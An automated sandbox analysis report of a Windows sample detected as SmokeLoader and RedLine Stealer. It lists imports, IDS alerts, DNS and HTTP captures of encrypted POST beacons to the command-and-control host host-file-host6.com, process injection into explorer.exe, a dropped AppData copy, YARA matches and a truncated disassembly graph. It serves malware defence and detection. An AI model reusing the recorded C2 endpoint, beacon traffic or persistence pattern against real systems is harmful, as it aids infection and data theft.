                                                                                        KERNEL32.dllSetThreadContext, WriteConsoleInputW, WriteConsoleOutputCharacterA, DeleteVolumeMountPointA, InterlockedIncrement, GetConsoleAliasA, InterlockedDecrement, GetSystemWindowsDirectoryW, GetFileAttributesExA, _lclose, MoveFileWithProgressA, GetModuleHandleW, LocalFlags, GetPrivateProfileStringW, ReadConsoleW, GetCompressedFileSizeW, SetCommState, ActivateActCtx, GlobalAlloc, LoadLibraryW, ReadConsoleInputA, CreateEventA, SetConsoleCP, GlobalFlags, GetConsoleAliasW, SetTimeZoneInformation, SetSystemPowerState, TerminateProcess, CreateFileW, FindFirstFileW, ReplaceFileA, DisconnectNamedPipe, GetTempPathW, GetNamedPipeHandleStateW, GlobalUnfix, FindFirstFileA, ReadConsoleOutputCharacterA, GetProcAddress, GlobalGetAtomNameA, OpenWaitableTimerW, GetFileType, BuildCommDCBAndTimeoutsW, RemoveDirectoryW, AddAtomA, FoldStringW, GetModuleHandleA, WriteProfileStringW, VirtualProtect, GetConsoleCursorInfo, SetThreadAffinityMask, SetProcessShutdownParameters, GetWindowsDirectoryW, GetConsoleProcessList, GetVolumeInformationW, ExpandEnvironmentStringsW, WriteConsoleW, SetStdHandle, FlushFileBuffers, GetConsoleMode, GetCommandLineW, SetProcessAffinityMask, CreateActCtxA, GetVolumeNameForVolumeMountPointA, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, WideCharToMultiByte, HeapFree, HeapAlloc, ExitProcess, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, WriteFile, GetModuleFileNameW, GetLocaleInfoW, HeapSize, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetStringTypeW, HeapReAlloc, SetFilePointer, GetConsoleCP, CloseHandle
                                                                                        USER32.dllCharUpperA, RegisterClassA, CharToOemBuffA
                                                                                        GDI32.dllGetCharWidthFloatW
                                                                                        ADVAPI32.dllClearEventLogA

                                                                                        Possible Origin

                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        Sami LappishFinland
                                                                                        Sami LappishNorway
                                                                                        Sami LappishSweden

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-09T14:53:55.228635+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.1049705188.40.141.21180TCP
                                                                                        2024-12-09T14:53:55.228635+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.1049705188.40.141.21180TCP
                                                                                        2024-12-09T14:53:56.103539+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.1049705188.40.141.21180TCP
                                                                                        2024-12-09T14:53:56.103539+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.1049705188.40.141.21180TCP
                                                                                        2024-12-09T14:54:21.048517+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.1049705188.40.141.21180TCP
                                                                                        2024-12-09T14:54:21.048517+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.1049705188.40.141.21180TCP
                                                                                        2024-12-09T14:54:21.650388+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.1049705188.40.141.21180TCP
                                                                                        2024-12-09T14:54:21.650388+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.1049705188.40.141.21180TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 9, 2024 14:53:53.777303934 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:53:53.896908998 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:53:53.897305965 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:53:53.897305965 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:53:53.897305965 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:53:54.018362999 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:53:54.018379927 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:53:55.174690962 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:53:55.228635073 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:53:55.508445024 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:53:55.508445024 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:53:55.627897978 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:53:55.628220081 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:53:56.063112020 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:53:56.103538990 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:54:20.492881060 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:54:20.492921114 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:54:20.612410069 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:54:20.612492085 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:54:21.041851997 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:54:21.048516989 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:54:21.051570892 CET4970580192.168.2.10188.40.141.211
                                                                                        Dec 9, 2024 14:54:21.168734074 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:54:21.171004057 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:54:21.597897053 CET8049705188.40.141.211192.168.2.10
                                                                                        Dec 9, 2024 14:54:21.650388002 CET4970580192.168.2.10188.40.141.211

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 9, 2024 14:53:51.910289049 CET5214953192.168.2.101.1.1.1
                                                                                        Dec 9, 2024 14:53:52.900516033 CET5214953192.168.2.101.1.1.1
                                                                                        Dec 9, 2024 14:53:53.773339033 CET53521491.1.1.1192.168.2.10
                                                                                        Dec 9, 2024 14:53:53.773375988 CET53521491.1.1.1192.168.2.10

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 9, 2024 14:53:51.910289049 CET192.168.2.101.1.1.10x4c8fStandard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 14:53:52.900516033 CET192.168.2.101.1.1.10x4c8fStandard query (0)host-file-host6.comA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 9, 2024 14:53:53.773339033 CET1.1.1.1192.168.2.100x4c8fNo error (0)host-file-host6.com188.40.141.211A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 14:53:53.773375988 CET1.1.1.1192.168.2.100x4c8fNo error (0)host-file-host6.com188.40.141.211A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • spylvifr.net
                                                                                          • host-file-host6.com
                                                                                        • ubpctscp.net
                                                                                        • lrvsgmets.com
                                                                                        • iwtkhvgidl.com

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.1049705188.40.141.211803968C:\Windows\explorer.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 9, 2024 14:53:53.897305965 CET272OUTPOST / HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Accept: */*
                                                                                        Referer: http://spylvifr.net/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                        Content-Length: 265
                                                                                        Host: host-file-host6.com
                                                                                        Dec 9, 2024 14:53:53.897305965 CET265OUTData Raw: 10 87 83 98 19 84 d0 b1 bd 49 0a 33 7e c3 91 f3 43 16 ac 41 a4 4d 62 ed bf ec af 82 8f d7 96 f5 1e b1 59 d4 1c 6f ba e2 e0 dd f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 0d dd a1 0a
                                                                                        Data Ascii: I3~CAMbYofh9\Fu$f]d9n?YINNT*da%,i7q,,_T%*!'<JuVpS<=$dc>3Kp: ?OLhA03aFXPoLr{OQ>,__tDG'
                                                                                        Dec 9, 2024 14:53:55.174690962 CET151INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.18.0
                                                                                        Content-Length: 7
                                                                                        Content-Type: application/octet-stream
                                                                                        Date: Mon, 09 Dec 2024 13:53:54 GMT
                                                                                        Data Raw: 03 00 00 00 7b fa b1
                                                                                        Data Ascii: {
                                                                                        Dec 9, 2024 14:53:55.508445024 CET272OUTPOST / HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Accept: */*
                                                                                        Referer: http://ubpctscp.net/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                        Content-Length: 144
                                                                                        Host: host-file-host6.com
                                                                                        Dec 9, 2024 14:53:55.508445024 CET144OUTData Raw: 10 87 83 98 19 84 d0 b1 bd 49 0a 33 7e c3 91 f3 43 16 ac 41 a4 4d 62 ed bf ec af 82 8f d7 96 f5 1e b1 59 d4 1c 6f ba e2 e0 dd f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de ec 66 5d 02 c8 a1 c1 64 12 ba bd 61
                                                                                        Data Ascii: I3~CAMbYofh9\Fu$f]day)kEqk.RcLB}(cb0b,c)yyI^q j5\]m
                                                                                        Dec 9, 2024 14:53:56.063112020 CET144INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.18.0
                                                                                        Content-Length: 0
                                                                                        Content-Type: application/octet-stream
                                                                                        Date: Mon, 09 Dec 2024 13:53:55 GMT
                                                                                        Dec 9, 2024 14:54:20.492881060 CET273OUTPOST / HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Accept: */*
                                                                                        Referer: http://lrvsgmets.com/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                        Content-Length: 147
                                                                                        Host: host-file-host6.com
                                                                                        Dec 9, 2024 14:54:20.492921114 CET147OUTData Raw: 10 87 83 98 19 84 d0 b1 bd 49 0a 33 7e c3 91 f3 43 16 ac 41 a4 4d 62 ed bf ec af 82 8f d7 96 f5 1e b1 59 d4 1c 6f ba e2 e0 dd f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 4b c6 cd 23
                                                                                        Data Ascii: I3~CAMbYofh9\Fu$f]dK#f"D4JA!TD9Z|rGNFq6uw)>9QO
                                                                                        Dec 9, 2024 14:54:21.041851997 CET151INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.18.0
                                                                                        Content-Length: 7
                                                                                        Content-Type: application/octet-stream
                                                                                        Date: Mon, 09 Dec 2024 13:54:20 GMT
                                                                                        Data Raw: 03 00 00 00 7b fa b1
                                                                                        Data Ascii: {
                                                                                        Dec 9, 2024 14:54:21.048516989 CET274OUTPOST / HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Accept: */*
                                                                                        Referer: http://iwtkhvgidl.com/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                        Content-Length: 274
                                                                                        Host: host-file-host6.com
                                                                                        Dec 9, 2024 14:54:21.051570892 CET274OUTData Raw: 10 87 83 98 19 84 d0 b1 bd 49 0a 33 7e c3 91 f3 43 16 ac 41 a4 4d 62 ed bf ec af 82 8f d7 96 f5 1e b1 59 d4 1c 6f ba e2 e0 dd f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de ec 66 5d 02 c8 a1 c1 64 20 9a b9 23
                                                                                        Data Ascii: I3~CAMbYofh9\Fu$f]d #wczLlJ6N}klie3w)LL\L8G?5P%]qU0#""OT6X9x3V("ZThT)\4F'WHp\!?G=x8
                                                                                        Dec 9, 2024 14:54:21.597897053 CET144INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.18.0
                                                                                        Content-Length: 0
                                                                                        Content-Type: application/octet-stream
                                                                                        Date: Mon, 09 Dec 2024 13:54:21 GMT


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:08:53:23
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Users\user\Desktop\e6reA52T4I.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\e6reA52T4I.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:212'992 bytes
                                                                                        MD5 hash:855E7CD7024D340B83123C75D9D4FB1C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:08:53:27
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Users\user\Desktop\e6reA52T4I.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\e6reA52T4I.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:212'992 bytes
                                                                                        MD5 hash:855E7CD7024D340B83123C75D9D4FB1C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:08:53:32
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Windows\explorer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                        Imagebase:0x7ff609fd0000
                                                                                        File size:5'141'208 bytes
                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:08:53:52
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\hdeufvw
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Roaming\hdeufvw
                                                                                        Imagebase:0x400000
                                                                                        File size:212'992 bytes
                                                                                        MD5 hash:855E7CD7024D340B83123C75D9D4FB1C
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1813482069.000000000098C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 82%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:08:53:58
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\hdeufvw
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Roaming\hdeufvw
                                                                                        Imagebase:0x400000
                                                                                        File size:212'992 bytes
                                                                                        MD5 hash:855E7CD7024D340B83123C75D9D4FB1C
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:8.6%
                                                                                          Dynamic/Decrypted Code Coverage:7.2%
                                                                                          Signature Coverage:8.8%
                                                                                          Total number of Nodes:1024
                                                                                          Total number of Limit Nodes:26
                                                                                          execution_graph 8036 407b2d 8083 40b330 8036->8083 8038 407b39 GetStartupInfoW 8039 407b4d HeapSetInformation 8038->8039 8041 407b58 8038->8041 8039->8041 8084 40ad8e HeapCreate 8041->8084 8042 407ba6 8043 407bb1 8042->8043 8131 407b04 8042->8131 8139 40a913 GetModuleHandleW 8043->8139 8046 407bb7 8047 407bc3 __RTC_Initialize 8046->8047 8048 407bbb 8046->8048 8085 40b0c5 GetStartupInfoW 8047->8085 8049 407b04 _fast_error_exit 56 API calls 8048->8049 8050 407bc2 8049->8050 8050->8047 8053 407bd4 8164 4078c5 8053->8164 8054 407bdc GetCommandLineW 8098 40c528 GetEnvironmentStringsW 8054->8098 8058 407bec 8171 40c47a GetModuleFileNameW 8058->8171 8060 407bf6 8061 407c02 8060->8061 8062 407bfa 8060->8062 8104 40c248 8061->8104 8063 4078c5 __amsg_exit 56 API calls 8062->8063 8065 407c01 8063->8065 8065->8061 8067 407c13 8118 4076a4 8067->8118 8068 407c0b 8069 4078c5 __amsg_exit 56 API calls 8068->8069 8071 407c12 8069->8071 8071->8067 8072 407c1a 8073 407c1f 8072->8073 8076 407c26 __wwincmdln 8072->8076 8074 4078c5 __amsg_exit 56 API calls 8073->8074 8075 407c25 8074->8075 8075->8076 8076->8075 8124 425d20 8076->8124 8079 407c55 8178 4078a7 8079->8178 8082 407c5a __mtinitlocknum 8083->8038 8084->8042 8181 4099fc 8085->8181 8087 40b0e3 8087->8087 8089 4099fc __calloc_crt 56 API calls 8087->8089 8092 40b1d8 8087->8092 8093 407bd0 8087->8093 8094 40b258 8087->8094 8088 40b28e GetStdHandle 8088->8094 8089->8087 8090 40b2f2 SetHandleCount 8090->8093 8091 40b2a0 GetFileType 8091->8094 8092->8094 8095 40b204 GetFileType 8092->8095 8096 40b20f InitializeCriticalSectionAndSpinCount 8092->8096 8093->8053 8093->8054 8094->8088 8094->8090 8094->8091 8097 40b2c6 InitializeCriticalSectionAndSpinCount 8094->8097 8095->8092 8095->8096 8096->8092 8096->8093 8097->8093 8097->8094 8099 40c539 8098->8099 8100 40c53d 8098->8100 8099->8058 8101 4099b7 __malloc_crt 56 API calls 8100->8101 8102 40c55f _memmove 8101->8102 8103 40c566 FreeEnvironmentStringsW 8102->8103 8103->8058 8105 40c260 _wcslen 8104->8105 8109 407c07 8104->8109 8106 4099fc __calloc_crt 56 API calls 8105->8106 8112 40c284 _wcslen 8106->8112 8107 40c2da 8108 40742e _free 56 API calls 8107->8108 8108->8109 8109->8067 8109->8068 8110 4099fc __calloc_crt 56 API calls 8110->8112 8111 40c300 8113 40742e _free 56 API calls 8111->8113 8112->8107 8112->8109 8112->8110 8112->8111 8114 411a7b __wsetenvp 56 API calls 8112->8114 8115 40c317 8112->8115 8113->8109 8114->8112 8116 40ac42 __invoke_watson 5 API calls 8115->8116 8117 40c323 8116->8117 8120 4076b2 __IsNonwritableInCurrentImage 8118->8120 8378 40bdc1 8120->8378 8121 4076d0 __initterm_e 8123 4076f1 __IsNonwritableInCurrentImage 8121->8123 8381 407a06 8121->8381 8123->8072 8125 426cb1 CharUpperA 8124->8125 8125->8125 8126 426cb8 8125->8126 8452 4257e0 8126->8452 8129 407c47 8129->8079 8175 40787b 8129->8175 8130 4272d9 GetTempPathW 8130->8129 8132 407b12 8131->8132 8133 407b17 8131->8133 8134 40b6f4 __FF_MSGBANNER 56 API calls 8132->8134 8135 40b545 __NMSG_WRITE 56 API calls 8133->8135 8134->8133 8136 407b1f 8135->8136 8137 407623 __mtinitlocknum 3 API calls 8136->8137 8138 407b29 8137->8138 8138->8043 8140 40a930 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8139->8140 8141 40a927 8139->8141 8143 40a97a TlsAlloc 8140->8143 9201 40a660 8141->9201 8146 40a9c8 TlsSetValue 8143->8146 8147 40aa89 8143->8147 8146->8147 8148 40a9d9 8146->8148 8147->8046 9210 40764d 8148->9210 8153 40aa21 DecodePointer 8156 40aa36 8153->8156 8154 40aa84 8155 40a660 __mtterm 59 API calls 8154->8155 8155->8147 8156->8154 8157 4099fc __calloc_crt 56 API calls 8156->8157 8158 40aa4c 8157->8158 8158->8154 8159 40aa54 DecodePointer 8158->8159 8160 40aa65 8159->8160 8160->8154 8161 40aa69 8160->8161 8162 40a69d __getptd_noexit 56 API calls 8161->8162 8163 40aa71 GetCurrentThreadId 8162->8163 8163->8147 8165 40b6f4 __FF_MSGBANNER 56 API calls 8164->8165 8166 4078cf 8165->8166 8167 40b545 __NMSG_WRITE 56 API calls 8166->8167 8168 4078d7 8167->8168 8169 407891 _abort 56 API calls 8168->8169 8170 4078e2 8169->8170 8172 40c4af _wparse_cmdline 8171->8172 8173 4099b7 __malloc_crt 56 API calls 8172->8173 8174 40c4f2 _wparse_cmdline 8172->8174 8173->8174 8174->8060 8176 40773b _doexit 56 API calls 8175->8176 8177 40788c 8176->8177 8177->8079 8179 40773b _doexit 56 API calls 8178->8179 8180 4078b2 8179->8180 8180->8082 8183 409a05 8181->8183 8184 409a42 8183->8184 8185 409a23 Sleep 8183->8185 8186 410854 8183->8186 8184->8087 8185->8183 8187 410860 8186->8187 8188 41087b _malloc 8186->8188 8187->8188 8189 41086c 8187->8189 8190 41088e HeapAlloc 8188->8190 8193 4108b5 8188->8193 8194 40ace6 8189->8194 8190->8188 8190->8193 8193->8183 8197 40a751 GetLastError 8194->8197 8196 40aceb 8196->8183 8209 40a62c TlsGetValue 8197->8209 8200 40a7be SetLastError 8200->8196 8201 4099fc __calloc_crt 53 API calls 8202 40a77c 8201->8202 8202->8200 8203 40a7b5 8202->8203 8204 40a79d 8202->8204 8226 40742e 8203->8226 8213 40a69d 8204->8213 8207 40a7a5 GetCurrentThreadId 8207->8200 8208 40a7bb 8208->8200 8210 40a641 TlsSetValue 8209->8210 8211 40a65c 8209->8211 8210->8211 8211->8200 8211->8201 8232 40b330 8213->8232 8215 40a6a9 GetModuleHandleW 8233 40b8de 8215->8233 8217 40a6e7 8240 40a73f 8217->8240 8220 40b8de __lock 55 API calls 8221 40a708 8220->8221 8243 40a2e1 InterlockedIncrement 8221->8243 8223 40a726 8255 40a748 8223->8255 8225 40a733 __mtinitlocknum 8225->8207 8227 407439 HeapFree 8226->8227 8231 407462 __dosmaperr 8226->8231 8228 40744e 8227->8228 8227->8231 8229 40ace6 __write_nolock 54 API calls 8228->8229 8230 407454 GetLastError 8229->8230 8230->8231 8231->8208 8232->8215 8234 40b8f3 8233->8234 8235 40b906 EnterCriticalSection 8233->8235 8258 40b81c 8234->8258 8235->8217 8237 40b8f9 8237->8235 8238 4078c5 __amsg_exit 55 API calls 8237->8238 8239 40b905 8238->8239 8239->8235 8376 40b805 LeaveCriticalSection 8240->8376 8242 40a701 8242->8220 8244 40a302 8243->8244 8245 40a2ff InterlockedIncrement 8243->8245 8246 40a30c InterlockedIncrement 8244->8246 8247 40a30f 8244->8247 8245->8244 8246->8247 8248 40a319 InterlockedIncrement 8247->8248 8249 40a31c 8247->8249 8248->8249 8250 40a326 InterlockedIncrement 8249->8250 8252 40a329 8249->8252 8250->8252 8251 40a342 InterlockedIncrement 8251->8252 8252->8251 8253 40a352 InterlockedIncrement 8252->8253 8254 40a35d InterlockedIncrement 8252->8254 8253->8252 8254->8223 8377 40b805 LeaveCriticalSection 8255->8377 8257 40a74f 8257->8225 8259 40b828 __mtinitlocknum 8258->8259 8260 40b84e 8259->8260 8283 40b6f4 8259->8283 8269 40b85e __mtinitlocknum 8260->8269 8316 4099b7 8260->8316 8266 40b844 8313 407623 8266->8313 8267 40b870 8271 40ace6 __write_nolock 55 API calls 8267->8271 8268 40b87f 8272 40b8de __lock 55 API calls 8268->8272 8269->8237 8271->8269 8273 40b886 8272->8273 8274 40b8b9 8273->8274 8275 40b88e InitializeCriticalSectionAndSpinCount 8273->8275 8278 40742e _free 55 API calls 8274->8278 8276 40b8aa 8275->8276 8277 40b89e 8275->8277 8321 40b8d5 8276->8321 8279 40742e _free 55 API calls 8277->8279 8278->8276 8280 40b8a4 8279->8280 8282 40ace6 __write_nolock 55 API calls 8280->8282 8282->8276 8324 411ade 8283->8324 8285 40b6fb 8286 40b708 8285->8286 8287 411ade __NMSG_WRITE 56 API calls 8285->8287 8288 40b545 __NMSG_WRITE 56 API calls 8286->8288 8290 40b72a 8286->8290 8287->8286 8289 40b720 8288->8289 8291 40b545 __NMSG_WRITE 56 API calls 8289->8291 8292 40b545 8290->8292 8291->8290 8293 40b566 __NMSG_WRITE 8292->8293 8294 40b682 8293->8294 8295 411ade __NMSG_WRITE 53 API calls 8293->8295 8294->8266 8296 40b580 8295->8296 8297 40b691 GetStdHandle 8296->8297 8298 411ade __NMSG_WRITE 53 API calls 8296->8298 8297->8294 8301 40b69f _TestDefaultLanguage 8297->8301 8299 40b591 8298->8299 8299->8297 8300 40b5a3 8299->8300 8300->8294 8331 411a7b 8300->8331 8301->8294 8304 40b6d5 WriteFile 8301->8304 8304->8294 8305 40b5cf GetModuleFileNameW 8306 40b5f0 8305->8306 8310 40b5fc _wcslen 8305->8310 8307 411a7b __wsetenvp 53 API calls 8306->8307 8307->8310 8309 41191e 53 API calls __NMSG_WRITE 8309->8310 8310->8309 8311 40b672 8310->8311 8340 40ac42 8310->8340 8343 4117b2 8311->8343 8359 4075f8 GetModuleHandleW 8313->8359 8319 4099c0 8316->8319 8318 4099f6 8318->8267 8318->8268 8319->8318 8320 4099d7 Sleep 8319->8320 8362 407564 8319->8362 8320->8319 8375 40b805 LeaveCriticalSection 8321->8375 8323 40b8dc 8323->8269 8325 411aea 8324->8325 8326 411af4 8325->8326 8327 